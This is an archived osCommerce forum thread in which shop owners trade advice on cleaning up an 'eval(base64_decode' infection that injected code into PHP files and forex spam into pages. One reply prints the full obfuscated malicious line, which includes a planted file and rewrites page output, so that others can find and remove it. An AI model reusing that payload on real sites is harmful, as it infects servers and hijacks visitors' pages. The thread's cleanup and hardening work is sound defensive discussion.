Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

eval(base64_decode Hack


FIMBLE

Recommended Posts

  • Replies 125
  • Created
  • Last Reply

Here is another question:

 

1) Lets say I find out where the hacked was done and erase the file...Is there a need then to still remove from all my files the <? /**/eval(base64_decode('aWYo......

 

Would it casuse any harm at all now that I have removed the source file?

Would I be penalize by Search Engines?

 

I have about 10 different php scripts on my hosting account (blogs, forums, etc) and they have all being infected!

 

2) How are they able to add that code to all pages, even if the have permission lower than 755?

 

i am so pissed off right now :angry:

 

Ricardo

Link to comment
Share on other sites

Hey Nic, thank you for your replies!

 

I can't seem to find the decoder for "gzdecode" or "gzinflate" Do you happen to know of a link or a script I can use to decode the rest?

 

Thanks!

 

Its a bad hack for sure, you need to remove all traces of the code, for thoroughness and security of your site, to leave it is not a good idea

Also remove the filemanager.php and links, the rename the admin.

 

Nic

Link to comment
Share on other sites

Can someone tell me is there a way to remove the hacker's code from each file by using a search and replace application? if so, can you recommend one and explain basically what to do

 

thanks

 

Ricardo

Link to comment
Share on other sites

Can someone tell me is there a way to remove the hacker's code from each file by using a search and replace application? if so, can you recommend one and explain basically what to do

 

thanks

 

Ricardo

 

Search replace is the fastest way to do it if you do not have a back up to restore from

copy the top two lines, they should be the malicious code, and the <?php tag

like this, Add this to the search box,

<?php //eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
<?php

 

in the replace box add

<?php

 

then go search and replace.

 

This will be OK for stock osC pages, but you will still need to search for pages that use <? rather than <?php like some contributions will, or your own customer pages

 

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

Can someone tell me is there a way to remove the hacker's code from each file by using a search and replace application? if so, can you recommend one and explain basically what to do

 

thanks

 

Ricardo

if you have not yet decoded the eval code, this is where the files to be removed are to be found

 

/home/xxxxxx/x/x/x/xxxxxxx/html/xxxxxxx/blog/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php'

 

I added the X's to protect your usernames

 

There could be anything up to 40 odd files places in this folder that do not belong.

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

I have a renamed admin directory and have deleted filemanager.php and references to it.

 

I have the Site Monitor contribution installed

 

My Questions,

1 Will Site Monitor spot the hack or does the hack disable Site Monitor

 

2 I have all Folders at 755 and the 2 configure.php files at 400. Is this correct or should the folders be lower

 

Martin

Live shop Phoenix 1.0.8.4 on PHP 7.4 Working my way up the versions.

Link to comment
Share on other sites

1) the new site monitor does give you hints, however you should use with caution as it lists all files that contain eval, which does exist in osCommerce as part of the official code to evaluate strings as php code.

So you will get reports of possible infection when none exists.

Its still a good thing to get used to though and will notify you of changes to your files which the attack will certainly do.

 

2) Read post #2 about permissions as Matt makes a good point.

 

Though for most hosts 755 and 400 is good.

The 400 worries me a little as a lot of sites will not function at this level which leads me to think that maybe you are one of the people Matt is talking about.

You will need to check you host

 

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

It's worth noting that ownership is as important as permissions. If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777. If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories.

 

A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that.

 

 

1) the new site monitor does give you hints, however you should use with caution as it lists all files that contain eval, which does exist in osCommerce as part of the official code to evaluate strings as php code.

So you will get reports of possible infection when none exists.

Its still a good thing to get used to though and will notify you of changes to your files which the attack will certainly do.

 

2) Read post #2 about permissions as Matt makes a good point.

 

Though for most hosts 755 and 400 is good.

The 400 worries me a little as a lot of sites will not function at this level which leads me to think that maybe you are one of the people Matt is talking about.

You will need to check you host

 

Nic

 

Thanks Nic

 

I use United Hosting and have always had folders at 755 and configures at 400, no perceivable problems, store works fine since its launch in June.

 

I am confused by the term Web User. I have my own domain name with a non shared SSL but on a shared server, am I the Web User, if not who is?

 

Should I be setting my Files to 444 and Folders to 555. I think United can handle these settings but if you explain what is correct it will help me immensely

 

Martin

Live shop Phoenix 1.0.8.4 on PHP 7.4 Working my way up the versions.

Link to comment
Share on other sites

the easiest way. other than asking your host is to set the permissions of the configure.php file to 644 and see if you get the red error warning across the top of your site.

If so then you are likely to need to set your permissions lower, i have to say the host you mention does have a totally fantastic name for itself.

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

Just found out i've been done as well, and the advice in this thread has been brilliant.

 

They hid the files in catalog/includes/languages/german/modules/newsletters!! There was about 40 or so files there.

 

Not surprised to find them hidden in German language, as i never look there. Needless to say, all other languages have now been deleted.

 

Does anyone know if Cpanel has a compare / delete tool in it? Would just be easier than manually deleting all the code.

 

Thanks

Link to comment
Share on other sites

eval(base64_decode hack going around the internet,

 

I found this bit of code (if your on a linux/unix server) very valuable in removing hacks like the one above.

Change it to fit your specifics and use at your own risk.

 

find . -name "*.php" -exec sed -e '/eval(base64_decode*/d' -i.bak {} \;

 

Navigate to your root/catalog directory to execute. It will recursively find every file ending with "php"; create a backup of the file with a ".bak" extention; within the file it will find and replace ANY line containing "eval(base64_decode*" then save the edited original file. You must edit "*.php" to process the files pertaining to your site. You must edit "eval(base64_decode*" to match a unique snippet of the hack code; (try to avoid strings that contain weird characters (/.*&!`~,etc) that need escaping to make your life easy).

 

As already noted you will probably need to fix/remove file_manager.php plus find and delete the deep planted files.

A current backup is always easier.

Yulem

Link to comment
Share on other sites

  • 3 weeks later...

Question

 

I have one question. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

I'm sure some hacker woke up one morning and decide to hack a million web sites.

 

And while he was at it advertise the company you mentioned just for "grins and giggles".

 

I'm sure no money changed hands.

 

Quite sure that's what happened....

:-"

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

permissions are not the determining factor for this attack, its the presence of the admin folder still called admin, and the filemanager.php.

Once in it will spread to any PHP file platform / package independent adding its code as it goes.

I can imagine in a lot of cases there will be many more php files that osC ones.

 

Typically, the hack has nothing to do with the admin folder name or the presence of filemanager.php. It is the fact that the admin directory is unsecured and does not require a log-in to access the folder.

 

If you can go to http://www.yourstore.com/admin (replace 'yourstore.com' with your domain and 'admin' with your admin folder name) and you get your store administration page without having to enter a username and password, then you are open to this hack.

Link to comment
Share on other sites

Typically, the hack has nothing to do with the admin folder name or the presence of filemanager.php. It is the fact that the admin directory is unsecured and does not require a log-in to access the folder.

 

If you can go to http://www.yourstore.com/admin (replace 'yourstore.com' with your domain and 'admin' with your admin folder name) and you get your store administration page without having to enter a username and password, then you are open to this hack.

 

 

You can tell me if i am incorrect, but this hack actively looks for amongst others the osid then the admin folder and the easy way in the filemanager.php

I don't fully understand what you mean about the admin folder, are you referring to the login page V2.2RC2A or the actual admin index as in V 2.2MS where no protection is available?

This is surely why renaming the admin folder and removing the filemanager.php is the recommended course of action.

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

I was recently asked by Harald to review this new layer of protection that gives you additional htaccess protection.

 

http://github.com/haraldpdl/oscommerce2/commit/fd5dff7a3c45511b4902780c67f9609e700dbb51

if used in conjunction with

http://github.com/haraldpdl/oscommerce2/commit/569917f654edab2b07bf61ab8caf2764ba1457c4

it gives you a single login via htaccess.

 

here are some screen shots of it

 

administrators.jpg

 

 

administrators2.jpg

 

administrators3.jpg

 

Nic

Sometimes you're the dog and sometimes the lamp post

[/url]

My Contributions

Link to comment
Share on other sites

I also have been hacked and found the malicious code. I banned a IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious.

 

I used the decode hack and it didnt work for me. Can someone tell me which files were planted and need to be removed?

 

What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked.

 

Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body.

 

Hey. This is the exact same thing with me. My website seems to work fine with the exception of no matter what I do lately my website has a very poor ranking compared to what it had a couple of months ago in spite of all of the optimization I have done with Web SEO. Actually, although I had noticed the eval base64 code at the top of all of my php file and didn't know what it was, it was using the Web SEO program and discovering all of the lines of text of keyword saturation in the body of my website with all of this "forex" trading stuff.

 

So, yeah, how best to go about cleaning up my website of all of the malicious code so it doesn't re-perpetuate itself. I am not familiar with using dbase decoders. :'(

Link to comment
Share on other sites

I keep getting emails through a email script on my site and i keep getting more and more any ideas what the heck this is? spammer? heres a couple of them:

 

eVRbqY _a href="http://xighsaxkazdh.com/"_xighsaxkazdh_/a_, [ url =http://pujvjjvvxcmv.com/]pujvjjvvxcmv[ /url ], [ link=http://sdxfkydlkpxn.com/]sdxfkydlkpxn[ /link], http://xmteuhyhgedt.com/

heres one that all the fields were filled in:



Name: hsxkwn
Email: [email protected]
Phone: 80253357799
State: New Mexico
Entered By: customer
2009-10-05 18:15:08

--------------------------------------------------------------------------------
Engine Info:
Engine Type: outboard

--------------------------------------------------------------------------------

Question / Comments: (edit)


tXx0i6 _a href="http://poqjzafyogxj.com/"_poqjzafyogxj_/a_, [url=http://shqfoyuzkbpm.com/]shqfoyuzkbpm[/url], [link=http://yxsbjpmnpqzl.com/]yxsbjpmnpqzl[/link], http://pwkihzcpjtzv.com/

tXx0i6 _a href="http://poqjzafyogxj.com/"_poqjzafyogxj_/a_, [url=http://shqfoyuzkbpm.com/]shqfoyuzkbpm[/url], [link=http://yxsbjpmnpqzl.com/]yxsbjpmnpqzl[/link], http://pwkihzcpjtzv.com/

 

Maybe this is how its getting in or maybe this has nothing to do with it.

Thanks

Link to comment
Share on other sites

 

How to prevent infection.

 

This is not guaranteed 100% proof but it is going to help stop re-infection.

 

Change the name of your admin folder to something less obvious.

Delete admin/filemanager.php and associated links.

Ensure that your folder permissions are never set higher than 755

Install some security addons,

Also some ideas from this post can help you,

If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.

There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here.

 

Nic,

should also admin/define_language.php be removed?

~ Don't mistake my kindness for weakness ~

Link to comment
Share on other sites

Hi All,

 

Looks like i too was a victim of this hack... now I have restored a backup from before the hack took place, but now i cannot access the admin panel... i put it in the browser and all it shows is a blank page on Firefox... anyone have any ideas?

 

All the files are in there... i have even tried using the standard install files... nothing :(

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...